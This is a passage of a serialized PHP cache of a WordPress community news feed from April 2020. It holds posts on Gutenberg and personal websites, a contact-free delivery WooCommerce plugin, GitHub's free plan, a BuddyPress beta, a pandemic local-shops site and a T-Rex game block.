Over the years, WordPress changed everything for me. I officially became a blogger. The problem was that, at a certain point, blogging became work. I needed to think about keywords, perfecting a post title, and making sure that each word was carefully crafted. The initial joy I had with my personal space had waned.

\n\n\n\n

“The idea of a ‘blog’ needs to get over itself,” wrote Joel Hooks in a post titled Stop Giving af and Start Writing More. “Everybody is treating writing as a ‘content marketing strategy’ and using it to ‘build a personal brand’ which leads to the fundamental flawed idea that everything you post has to be polished to perfection and ready to be consumed.”

\n\n\n\n

It is almost as if he had reached down into my soul and figured out why I no longer had the vigor I once had for sharing on my personal blog. For far too long, I was trying to brand myself. Posts became few and far between. I still shared a short note, aside, once in a while, but much of what I shared was for others rather than myself.

\n\n\n\n

I still love the idea of a personal blog, but there is room for this space to be reshaped. Personal websites can be so much more than a progression of posts over time, newer posts showing up while everything from the past is neatly tucked on “page 2” and beyond.

\n\n\n\n

Amy Hoy, in How the Blog Broke the Web, describes the downfall of the digital gardens that once grew across the landscape of the web. It is a history of how personal websites, particularly through the ease of use of the modern CMS, changed for the worse. Instead of carefully tending to our gardens, we became lazy caretakers of our space, molding our content based on the tools the system provided.

\n\n\n\n

She concluded with:

\n\n\n\n

“There are no more quirky homepages. There are no more amateur research librarians. All thanks to a quirky bit of software produced to alleviate the pain of a tiny subset of a very small audience. That’s not cool at all.”

\n\n\n\n

She shares my nostalgia for the early web in which webmasters poured everything about themselves into their little slice of it. It was done over the sweat and tears of late-night HTML mastery. It was about fighting weird CSS quirks just to align something on the center of the page. No grid or flex-box existed in those days.

\n\n\n\n

While I lament the loss of some of the artistry of the early web and lay much of the blame at the feet of blogging platforms like WordPress, such platforms also opened the web to far more people who would not have otherwise been able to create a website. Democratizing publishing is a far loftier goal than dropping animated GIFs across personal spaces.

\n\n\n\n

WordPress is in a position to reshape the web into whatever we want.

\n\n\n\n

Throughout the platform’s history, end-users have remained at the mercy of their WordPress theme. Most themes are built around what WordPress allows out of the box. They follow a similar formula. Some may have a fancy homepage or other custom page templates. But, on the whole, themes have been primarily built around the idea of a blog. Such themes do not give the user true control over where to place things on their website. While some developers have attempted solutions to this, most have never met the towering goal of putting the power of HTML and CSS into the hands of users through a visual interface. This lack of tools has given rise to page builders and the block editor.

\n\n\n\n

WordPress has not been, by and large, an ideal platform for building a unique digital space, unless you had the technical know-how to wrangle its front-end output into something unique. At times, that is more frustrating than building a simple HTML page.

\n\n\n\n

This is the reason that I continually push the Gutenberg project. I write about some of the wild and wacky ideas. I share things like a T-Rex game within a block.

\n\n\n\n

I want end-users to be able to create their own digital gardens. I want them to put a large yellow box on their homepage to share a notice that everyone should read “this important page” on their site. I want them to be able to do this without having to learn how to code or ask their theme author how to make such customizations. It should be as simple as clicking a few buttons.

\n\n\n\n

I also want them to be able to easily build something like Tom Critchlow’s wikifolder, a digital collection of links, random thoughts, and other resources.

\n\n\n\n

More than anything, I want personal websites to be more personal.

\n\n\n\n

We’re still in a somewhat frustrating transitional period where WordPress is not even halfway to becoming the platform that it will be. We are still beholden to our themes, though less so than before.

\n\n\n\n

Whether it is a digital garden, a plain ol’ blog, or some new thing we do not have a term for yet, we will all be able to put our unique spin on our personal spaces. It is part of the web that we lost in the last couple of decades with the emergence of the CMS. However, WordPress is on the right path.

\n\n\n\n

It may be a rough ride for some agencies and businesses around the platform, but I am OK with that. They will manage and pull through on the other side, mostly unscathed. I am more concerned about our mission statement of democratizing publishing. And, that mission is not simply about having the ability to write content via a $free system. It is about the freedom to create whatever types of digital homes that we desire without learning to code or breaking the bank.

\n\n\n\n

Pre-Gutenberg WordPress got us part of the way there. It is the post-Gutenberg world that will get us the rest of the way. I am ready to see what people create when they gain the freedom that particular world promises.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Apr 2020 20:00:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"WPTavern: Leave at Door: New Free WooCommerce Plugin Enables Contact-free Delivery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98679\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:207:\"https://wptavern.com/leave-at-door-new-free-woocommerce-plugin-enables-contact-free-delivery?utm_source=rss&utm_medium=rss&utm_campaign=leave-at-door-new-free-woocommerce-plugin-enables-contact-free-delivery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3199:\"

As many countries around the world are currently in some form of lockdown to mitigate the spread of the coronavirus, the hospitality industry has been one of the hardest hit by the new restrictions. Restaurants and breweries in particular have had to radically change how they do business and either lay off or furlough the majority of their employees. Many of those that have survived the mandated dine-in closures are jump-starting delivery services in order to stay afloat.

\n\n\n\n

Scott DeLuzio, a WordPress plugin developer and founder of Amplify Plugins, recently noticed a “leave at door” option when ordering food from a local restaurant. He thought it would be a helpful option for WooCommerce store owners to add and created a plugin that makes it easy.

\n\n\n\n
\n\n\n\n

Leave at Door is now available for free from the official WordPress Plugin Directory. It enables customers to maintain social distancing while receiving deliveries. The plugin adds a checkbox before the Place Order button at checkout, which reveals an optional text input for additional delivery instructions. If the customer chooses contact-free delivery, store owners will see it displayed on the admin order edit screen and in the order email. It will also be displayed on the customer’s order invoice.

\n\n\n\n

DeLuzio’s Amplify Plugins shop focuses on plugins that improve the customer experience in WooCommerce. He reported that his products have seen more activity since social distancing recommendations were put in place. With the pandemic slowing down shipments from Amazon and other major retailers, local and independent stores have an opportunity to gain the confidence of new customers.

\n\n\n\n

“I have definitely seen an uptick in plugin sales over the last month or so,” DeLuzio said. “I think, through talking to a few customers, this can probably be attributed to traditional brick and mortar stores and restaurants that are looking to move online to compensate for the lack of foot traffic that they are getting in their stores.”

\n\n\n\n

The availability of contact-free delivery may be the deciding factor for some customers in quarantine, which could make all the difference for small business owners.

\n\n\n\n

“There are probably a good number of local businesses that are struggling these days,” DeLuzio said. “Their customers are probably very concerned with the virus and maintaining social distancing, so if something like this plugin can help them out, even in a small way, I’m happy to have been able to put it together for them.”

\n\n\n\n

Even when some economies begin opening up, there will undoubtedly be customers who will still be keen on having a contact-free delivery option, especially those among the populations most vulnerable to COVID-19. The notion of contact-free delivery may have a longer run beyond this current crisis and perhaps even become a permanent fixture on e-commerce checkout screens.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Apr 2020 21:00:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: GitHub Opens Free Plan to Unlimited Collaborators on Private Repositories\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98641\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:211:\"https://wptavern.com/github-opens-free-plan-to-unlimited-collaborators-on-private-repositories?utm_source=rss&utm_medium=rss&utm_campaign=github-opens-free-plan-to-unlimited-collaborators-on-private-repositories\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4411:\"

On Tuesday, GitHub announced a change to its plans that would make collaboration between developers much cheaper. Free, in fact. Anyone can launch an organization for at no charge with unlimited public and private repositories. The change also includes an unlimited number of collaborators.

\n\n\n\n

This will be good news for small WordPress development teams without the cashflow to upgrade to the paid Team pricing tier or higher. I have worked with several small plugin and theme businesses who could not foot the per-user billing and sought other solutions such as GitLab and Bitbucket. This move should make GitHub more enticing.

\n\n\n\n

According to the FAQs page, this pricing change is a permanent one.

\n\n\n\n

“Until now, if your organization wanted to use GitHub for private development, you had to subscribe to one of our paid plans,” wrote Nat Friedman, CEO of GitHub, in the announcement. “But every developer on earth should have access to GitHub. Price shouldn’t be a barrier.”

\n\n\n\nGitHub’s lowest pricing tiers.\n\n\n\n

The Free pricing tier now offers:

\n\n\n\n\n\n\n\n

For a full overview of all changes, GitHub has created a question-and-answer section in its FAQs that covers each detail.

\n\n\n\n

“This means teams can now manage their work together in one place: CI/CD, project management, code review, packages, and more,” said Friedman. “We want everyone to be able to ship great software on the platform developers love.”

\n\n\n\n

The paid Team plan still exists. Like the Free plan, it is cheaper for a team of developers. GitHub reduced the pricing from $9/month for each user to $4/month. The plan also includes 3,000 GitHub Actions minutes each month, which will go into effect on May 14.

\n\n\n\n

GitHub seems to be moving away from its previous pay-for-private model. Instead, they have focused more on pricing based on features. In January 2019, several months after Microsoft acquired GitHub, the company announced unlimited free private repositories. However, only three collaborators were allowed on a project before being required to upgrade to a pro plan.

\n\n\n\n

GitHub has essentially cornered the market on open-source in which most code is maintained in public repositories. With the recent acquisition of npm, it will only grow stronger in this space. This pricing change should make it far more competitive for hosting private projects. The free tier puts the company on par with GitLab’s free level. Bitbucket is now looking a little more costly. It would not be surprising if the site removed its five-collaborator limit on its free plan if it sees a dip in usage.

\n\n\n\n

On the whole, this will be a good thing for commercial WordPress theme and plugin authors. From several companies I have knowledge of or have worked with, many of them have kept their public repositories on GitHub. However, they would use a different site for private repositories. It was a pain they had to deal with to cut costs. With no limits on the number of collaborators, GitHub’s free plan may mean that some can move all of their repositories to a single home. Even if they wanted to upgrade to the Team plan for access to more tools, the reduced cost may be worth it if they prefer working with GitHub.

\n\n\n\n

The biggest change is there is no initial cost barrier for teams that are kicking off a private project with no funding on hand. This is a good thing for small businesses.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Apr 2020 19:49:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"BuddyPress: BuddyPress 6.0.0-beta2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=310989\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://buddypress.org/2020/04/buddypress-6-0-0-beta2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2882:\"

BuddyPress 6.0.0-beta2 is now available for testing!

\n\n\n\n

Since 6.0.0-beta1:

\n\n\n\n\n\n\n\n
\n\n\n\n

6.0.0 final release is approaching!

\n\n\n\n

The end of April 2020 is in 15 days! Please make sure to read these important development notes about the 6.0.0 release.

\n\n\n\n

We’d love you to give us a hand to get there. Testing this new beta release is the very first way you can get involved into BuddyPress. You can test the 6.0.0-beta2 pre-release in 4 ways :

\n\n\n\n\n\n\n\n

Contributing to BuddyPress translations is another very important task for our project. If you speak a language other than English, please help us translate BuddyPress into more than 100 languages!

\n\n\n\n

6.0.0 is almost ready, but please do not run this Beta 2 pre-release in a production environment just yet. Let us know of any issues you find in the support forums and/or on our development tracker.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 Apr 2020 21:37:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mathieu Viet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"WPTavern: Gutenberg 7.9 Adds Gradients to More Blocks, Extra Typography Controls, and New Patterns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98498\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:237:\"https://wptavern.com/gutenberg-7-9-adds-gradients-to-more-blocks-extra-typography-controls-and-new-patterns?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-7-9-adds-gradients-to-more-blocks-extra-typography-controls-and-new-patterns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5813:\"

For Gutenberg junkies, the three-week wait between major releases has been rough, especially during this time when many are looking for new things to fill the gaps in our social calendars. Not to fret, the team dropped version 7.9 of the plugin earlier today. This release includes several goodies such as new typography-related controls for blocks, extra patterns for testing, and even more work toward a lighter DOM for theme authors.

\n\n\n\n

With the added time, version 7.9 is a larger release than usual. It includes over two dozen bug fixes and almost as many minor enhancements. The team continued work on full-site editing, which has moved along at a steady pace and is currently slated to land in WordPress 5.6 later this year.

\n\n\n\n

The development team has made several tweaks to the user interface. This is a continuation of the work that has landed in the previous couple of major releases. WordPress users who are not running the Gutenberg plugin can expect to see the refreshed UI in August this year when WordPress 5.5 drops.

\n\n\n\n

One nice change is to the link inserter. Instead of outputting the URL from an existing post, it will output the post title instead. This should make it far quicker for users to insert links to their posts or pages in the editor.

\n\n\n\n

Fullscreen mode can now be toggled on and off via the Ctrl + Shift + Alt + F keyboard shortcut. That is assuming you consider remembering which four keys to press a shortcut. At least the option exists for those who need it. I suppose I will acquire the muscle memory to toggle it over time.

\n\n\n\n

On the whole, this a major release in every sense. Everything from documentation to code quality has seen improvements. Developers can enjoy new APIs. Theme authors should also have an easier time styling buttons — the editor HTML should now be consistent with front-end output.

\n\n\n\n

Gradient All the Things

\n\n\n\nCustom gradient background for the Media & Text block.\n\n\n\n

Until now, users could add gradient backgrounds to the cover and button blocks. Gutenberg 7.9 extends this option to the group, columns, and media & text blocks.

\n\n\n\n

I have yet to see many theme authors take advantage of gradients. Granted, gradient backgrounds only landed in WordPress 5.4. I am hoping some of the top designers in the theme space can tackle this, if for no other reason than providing me some new eye candy when writing posts such as this that discuss gradients in Gutenberg.

\n\n\n\n

On the whole, the addition of the gradients option to new blocks is a good thing. The next step is to continue expanding it to other blocks.

\n\n\n\n

Typography for Headings and Paragraphs

\n\n\n\nAdjusting the font size of a heading block.\n\n\n\n

The Gutenberg team has finally checked off one of my longstanding pet peeves. The heading block now has a font-size option. Instead of users using an H1-level heading to make their text larger, they can stick with an appropriate-level heading for the document structure while using the font-size option to adjust how large it appears.

\n\n\n\n

I am concerned about the addition of a new setting to allow users to adjust the line-height for paragraphs and headings. Currently, the setting does not allow theme authors to add choices based on their design system or disable the feature altogether.

\n\n\n\n

We also get some new inline styles instead of classes. At this point, that ship has already sailed and sunk with Gutenberg.

\n\n\n\n

The usefulness of a line-height setting is clear when designing a full-page layout, such as a single-page brochure. However, changing the line-height for most text on a site could have dire consequences in the long term, especially when an end-user switches themes and finds that their chosen line-height is completely out of sync with their new theme. I would not wish the pain of updating dozens or more old blog posts to adjust paragraph design on anyone. Of course, the same could be said of font sizes and similar settings. This is the one setting that I want to see with more theme author feedback as part of the decision.

\n\n\n\n

Three New Block Patterns

\n\n\n\nInserting the Numbered Features block pattern into the editor.\n\n\n\n

Gutenberg 7.9 removed the block patterns icon from the top right and tucked it behind the editor options menu. Users can pin the patterns sidebar, which will move the patterns icon back to the top for quick access.

\n\n\n\n

The update also introduces three additional block patterns, bringing the total to six.

\n\n\n\n\n\n\n\n

The Numbered Features pattern is by far the most intricate pattern the Gutenberg team has put together while building the block patterns system. It is nice to see them exploring some designs that users will find useful.

\n\n\n\n

At this point, most of the patterns are relatively boring and not representative of how feature-rich this system will become in the future. It is important to remember that patterns are still at an early stage of development. By the time the feature lands in core WordPress, we should see more advanced and beautiful patterns for use on websites.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 Apr 2020 20:14:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"HeroPress: Helping Small Businesses During A Pandemic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=3109\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:158:\"https://heropress.com/essays/helping-small-businesses-during-a-pandemic/#utm_source=rss&utm_medium=rss&utm_campaign=helping-small-businesses-during-a-pandemic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:11544:\"\"WordPress

In mid March 2020 it was clear that the coronvirus pandemic was going to have drastic consequences for daily life. Many local shops, market stalls and other food outlets would struggle to keep in touch with their regular customers. It was also worrying that lots of people would be stuck at home with only the internet and phone as ways to keep in touch with their local shops.

\n

Getting Started

\n

I decided to create a small site for local shops (and other related businesses) to put their contact info on so that people could get in touch. I bought the domain name www.cambridgelocalshops.co.uk and got started. I decided to have several main sections – shops, food outlets, local support, delivery companies and activities.

\n

I add most shops that request to be added – small national brand supermarkets as well as independent shops. The only shops I’ve decided not to include are ones that could be misconstrued as giving medical advice.

\n

This whole site is required because of a medical emergency and clear messaging on that topic is vital.

\n

Some pubs and restaurants have started doing take-away food from their kitchens, and in addition offer a grocery ordering service. It’s a great way to keep their business open and offer really useful support to their community. Watching businesses change how they operate to help their communities is inspiring. I’ve heard that many neighbourhood ‘mutual aid groups’ have found the site a useful way to get information about shops out to people who are isolated at home.

\n

Spreading The Word

\n

I shared the site on twitter and various other local groups I’m a member of. The number of hits I was getting on the site daily showed there was a need. The local university printing office, just before closing for lockdown, ran off 10,000 leaflets about the site. The local bike courier company delivered them door to door free of charge. For them it was a way of supporting local businesses and shops that are their key customers in more normal times, and providing an important community service right now. The photos are all from unsplash.com – free of charge and great quality.  Jo at Kabocreative designed the great logo and shared it with me.

\n

Having designed the site in a morning using TwentySeventeen as the theme and using Atomic Profile Blocks for the individual shops I realised I needed something a bit more streamlined.

\n

Juggling this clunky way of editing a site alongside home schooling two children and facing the challenges of life under lockdown was not viable. I started redeveloping the site behind the scenes, using posts instead of pages for each shop, categorising them according to type of shop and their location, and then building a site structure out of that categorising system. I also switched to GeneratePress for the theme (I love it). It all kind of worked.

\n

Reaching Out

\n

Then I got in touch with Topher DeRosia asking if he’d like me to write this up for his wonderful HeroPress blog aimed at the WordPress community. Many towns and districts around the world could do with a site like this and it’s a perfect way for a WordPress person to support their local shops and neighbours at this time.

\n

Topher did way more than that, coming on board to take a look at the back end of the site, make some brilliant changes and also contacting WSForm for a pro plugin to help with the process.

\n

Now, when someone completes the form to request an entry on the site it automatically creates a post with that shops’ details already pre drafted.

\n

I just need to add the categories, check the details, and publish it. It is a dream to manage as it is so fast to add a new shop. I am hugely grateful to Topher for dedicating so much time and care to this when all I expected was the chance to share an idea with others.

\n

The site already has a sibling – www.stivesandvillages.co.uk – set up by my friends Penni and Jo at KaboCreative. If you’re interested in creating something similar to support your community while under lockdown check out Topher’s technical tips and some special offers we’ve negotiated with WSForm and GeneratePress to make your life easier and a bit cheaper! Thanks to these companies for their support.

\n

What We Learned

\n

Here are a few key tips I gave Penni when she got in touch to ask about using my idea for her local area:

\n\n

I’ve enjoyed putting this site together, interacting with all the business owners who’ve entered their details, and making new friends when other people got involved. I highly recommend it as a way of doing something useful in these strange times.

\n
\n

Editor’s Note

\n

Topher here. Part of the plan all along was to make it so other people can easily replicate what Elisabeth did. You can find a post on my personal blog detailing how it all works, and you can download the plugins, theme, and export files.

\n

If you think your local business area could use something like what Elisabeth built, now you can easily do it yourself.

\n

GeneratePress and WSForm are both commercial products, but for this project they generously offer a 20% discount to anyone building something like Elisabeth’s project. You can find the discount codes on the blog post I mentioned above.

\n

Thank you Elisabeth for doing such a great work, and thank you for allowing me to be a part of it!

\n

The post Helping Small Businesses During A Pandemic appeared first on HeroPress.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 15 Apr 2020 09:00:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Elisabeth Klaar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: Block-a-saurus Embeds a Side-Scrolling T-Rex Game via the Block Editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98606\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:205:\"https://wptavern.com/block-a-saurus-embeds-a-side-scrolling-t-rex-game-via-the-block-editor?utm_source=rss&utm_medium=rss&utm_campaign=block-a-saurus-embeds-a-side-scrolling-t-rex-game-via-the-block-editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6574:\"
\n

Click to Play

\n
\n\n\n\n

It is no secret that I love testing out the sort of fun WordPress blocks that hark back to my early days of the web. I have written on the subject once or twice. Imagine my surprise when I came across a side-scrolling dinosaur game that users could simply plop into the block editor and provide something fun for their visitors to do.

\n\n\n\n

Block-a-saurus is a simple game in which you play a T-Rex whose goal is to survive a course of obstacles such as jumping cactuses and ducking birds. To play, you merely need to control the T-Rex via your keyboard’s D-pad. It should also work via touch control on mobile devices.

\n\n\n\n

The only bad thing is that I did not notice this gem eight months ago when it was first released to the public.

\n\n\n\n

“When I started learning about blocks, I realized they could be basically miniature JavaScript applications,” said Keanan Koppenhaver, the developer behind Block-a-saurus. “I thought this was super interesting as opposed to how WordPress plugins relied more heavily on PHP, so I wanted to see what I could do with basically a blank JavaScript canvas and how that could enable experiences that would have been really difficult to do seamlessly pre-Gutenberg. It slowly went from a ‘Is this even possible?’ to ‘Let’s release it and see if it can inspire people to build something even more out of the box.\'”

\n\n\n\n

Give the game a whirl. Let us know your high score in the comments!

\n\n\n\n

Using the Block-a-saurus Plugin

\n\n\n\n

The plugin is straightforward. Once installed, it adds a new “Block-a-saurus!” block in the common blocks section of the block inserter. The block currently has two options under the block settings panel:

\n\n\n\n\n\n\n\nInserting the Block-a-saurus block in the editor.\n\n\n\n

By default, the front-end output is bland. Do not expect a graphical powerhouse. However, sometimes, the simplest games can make for hours of fun.

\n\n\n\nDefault output of Block-a-saurus on the front end.\n\n\n\n

I wanted to spruce up my game’s design on the front end. Therefore, I first inserted a cover block with a dinosaur background, as can be seen at the beginning of this post. I then dropped the plugin’s block within the cover block.

\n\n\n\n

This works well with a variety of image backgrounds. Plus, it allows users to put a unique spin on their game.

\n\n\n\nA custom background using the cover block around Block-a-saurus.\n\n\n\n

